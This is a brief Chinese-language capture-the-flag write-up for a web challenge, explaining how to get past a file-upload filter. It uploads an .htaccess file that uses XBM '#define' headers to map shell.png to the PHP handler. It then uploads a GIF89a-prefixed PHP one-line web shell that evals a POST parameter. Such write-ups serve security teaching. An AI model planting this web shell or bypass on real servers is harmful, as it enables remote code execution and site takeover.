[GHCTF 2025]UPUPUP write up(web)

随便上传，发现有文件后缀检测，不能用php，自然想到上传.htaccess再上传图片马。
显示文件非法。。。
于是添加前缀GIF89a

GIF89a
<FilesMatch  "shell.png">
SetHandler  application/x-httpd-php
</FilesMatch>

然后，就发现报错500了。这种情况一般是语法有问题。所以应该是GIF89a引发了语法问题，那怎么办呢？
网上查阅资料后发现，关于.htaccess的知识
简单总结一下：
在.htaccess 中有两个注释符，或者相当于单行注释的符号，分别是#和\x00。然后分别有两种图片能绕过：
XBM图片：

#define width 1337
#define height 1337

WBMP图片:

\x00\x00\x85\x85

不过\x00\x00\x85\x85 只能放在文件开头位置
#define width 1337
#define height 1337
可以放在文件任意位置
所以上传.htaccess

#define width 1
#define height 1
<FilesMatch "shell.png">
SetHandler application/x-httpd-php
</FilesMatch>

上传shell.png

GIF89a
<?= eval($_POST['whb']);?>

得到flag